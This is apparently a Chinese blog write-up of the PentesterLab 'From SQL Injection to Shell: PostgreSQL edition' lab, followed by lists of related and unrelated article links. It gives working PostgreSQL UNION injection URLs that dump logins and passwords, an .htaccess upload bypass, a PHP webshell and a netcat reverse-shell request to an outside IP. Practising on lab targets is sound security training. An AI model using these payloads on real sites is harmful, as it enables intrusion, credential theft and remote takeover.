一、打开页面，随便点了几下，返现和From SQL Injection to Shell差不多，直奔主题开始注入

　　由于PostgreSQL与MySQL不同，几个关注点需要注意下

二、order by下看看有几个字段

/cat.php?id=%20order%20by%

#order by 4正常，5出现报错，说明有4个字段

三、查看注入点在什么位置，这里与MySQL不同的是，不能再用select 1,2,3……的方式去探测，要改用null，因为PostgreSQL对类型限制很严格

http://192.168.109.131/cat.php?id=1%20union%20select%20null,version(),null,null

发现只有第二个字段可以出来东西，注入点在第二个字段

四、查看当前库名

http://192.168.109.131/cat.php?id=1%20UNION%20SELECT%20null,datname,null,null%20from%20pg_database%20limit%201%20offset%205

五、查看表名

http://192.168.109.131/cat.php?id=1%20UNION%20SELECT%20null,relname,null,null%20from+pg_stat_user_tables+limit+1+offset+0

六、查看各个字段，遍历offset

http://192.168.109.131/cat.php?id=1%20UNION%20SELECT%20null,column_name,null,null%20from%20information_schema.columns%20where%20table_name=%27users%27%20limit%201%20offset%202

得出有login和password

七、直接通过拼接字符串，读取数据

http://192.168.109.131/cat.php?id=1%20UNION%20SELECT%20null,login||chr(124)||password,null,null%20from%20users

八、MD5解密后，为admin|P4ssw0rd，直接登录后台进行上传

九、上传时发现，改后缀名为php3，Content-Type，加入图片文件头都无法成功上传，查询教程后得知，可以通过.htaccess来进行绕过

十、先编写一个.htaccess文件，内容为一下内容，进行上传

AddType application/x-httpd-php .blah

这个文件的意思是告诉apache，把.blah后缀的文件按照php进行解析

十一、在上传shell，不过这次shell不是.php后缀名，而是.blah

<?php

system($_GET['cmd'])

?>

十二、查看源代码，得知上传位置，直接访问上传的webshell，进行shell反弹

http://192.168.109.131/admin/uploads/function.blah?cmd=nc%2030.117.75.238%209999%20-e%20/bin/bash

PentesterLab-From SQL Injection to Shell: PostgreSQL edition的更多相关文章

1. [SQL注入2]FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION

   FROM SQL INJECTION TO SHELL: POSTGRESQL EDITION 这里先介绍一下POSTGRESQL.这是一款数据库管理系统,与oracle是同类型软件.08年左右的市场 ...

2. [SQL注入1]From SQL injection to Shell

   第一次写,希望大神们多指点. 对于刚接触WEB渗透测试这块的朋友们,很希望能有个平台可以练习.网络上有不少,十大渗透测试演练系统,我这里推荐一个在10以外,适合初学者一步一步进步的平台PENTESTE ...

3. PentesterLab-From SQL Injection to Shell

   一.打开靶机ip出现如下界面: 随便点一下,点到test链接,访问了如下url:http://192.168.109.131/cat.php?id=1,这里出现了一个id,常规思路这个位置可能有sql ...

4. Exploiting second-order SQL injection 利用二阶注入获取数据库版本信息 SQL Injection Attacks and Defense Second Edition

   w SQL Injection Attacks and Defense  Second Edition Exploiting second-order SQL injection Virtually ...

5. SQL injection

   SQL injection is a code injection technique, used to attack data-driven applications, in which malic ...

6. SQL注入——SQL Injection

   本文部分内容转自:https://www.cnblogs.com/rush/archive/2011/12/31/2309203.html http://www.diybl.com/course/7_ ...

7. 防sql注入之参数绑定 SQL Injection Attacks and Defense

   http://php.net/manual/zh/pdo.prepared-statements.php 预处理语句与存储过程 很多更成熟的数据库都支持预处理语句的概念.什么是预处理语句?可以把它看作 ...

8. DVWA SQL Injection 通关教程

   SQL Injection,即SQL注入,SQLi,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的.SQL注入漏洞的危害巨大,常常会导致整个数据库被“脱 ...

9. 防sql注入之参数绑定 SQL Injection Attacks and Defense 预处理语句与存储过程

   http://php.net/manual/zh/pdo.prepared-statements.php 预处理语句与存储过程 很多更成熟的数据库都支持预处理语句的概念.什么是预处理语句?可以把它看作 ...

随机推荐

1. linux清理内存

   free -m echo 1 > /proc/sys/vm/drop_caches

2. HTML第三天作业做的表格

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xht ...

3. 浅谈Excel开发：三 Excel 对象模型

   前一篇文章介绍了Excel中的菜单系统,在创建完菜单和工具栏之后,就要着手进行功能的开发了.不论您采用何种方式来开发Excel应用程序,了解Excel对象模型尤其重要,这些对象是您与Excel进行交互 ...

4. BZOJ1088扫雷Mine 解析报告

   1088: [SCOI2005]扫雷Mine Description 相信大家都玩过扫雷的游戏.那是在一个n*m的矩阵里面有一些雷,要你根据一些信息找出雷来.万圣节到了,“余”人国流行起了一种简单的扫 ...

5. PHP后台代码 及 iOS客户端--AF实现上传视频

   //视频转换为MP4 //转码操作... _hud.mode = MBProgressHUDModeIndeterminate; _hud.labelText = @"转码中...&quot ...

6. &lbrack;MySQL&rsqb; 关系型数据库的设计范式 1NF 2NF 3NF BCNF

   一.缘由: 要做好DBA,就要更好地理解数据库设计范式.数据库范式总结概览: 为了更好地理解数据库的设计范式,这里借用一下知乎刘慰老师的解释,很通俗易懂.非常感谢!   二.具体说明: 首先要明白”范 ...

7. 如何开发一个自己的 RubyGem？

   「如何测试你的 RubyGem?」的前导文章 什么是 RubyGem RubyGem 是 Ruby 语言的标准源码打包格式. 大家一直都在用gem这个命令,但是很少有人知道这个东西是怎么来的,这里我从 ...

8. JavaScript与DOM的关系

   JavaScript与浏览器的工作 1.浏览器获取并加载你的页面,从上至下解析它的内容. 遇到JavaScript时,浏览器会解析代码,检查它的正确性,然后执行代码. 浏览器还会建立一个HTML页面的 ...

9. nyoj 2 括号配对问题

   括号配对问题 时间限制:3000 ms  |            内存限制:65535 KB 难度:3   描述 现在,有一行括号序列,请你检查这行括号是否配对.   输入 第一行输入一个数N(0& ...

10. Houdini Pyro流体的插值变速

    用简单的节点尝试了下Houdini流体的变速,这里的流体指的是Pyro,而不是FLIP.FLIP仅仅须要记录ID属性然后TimeBlend & TimeShift就可以. Vimeo 上图是一 ...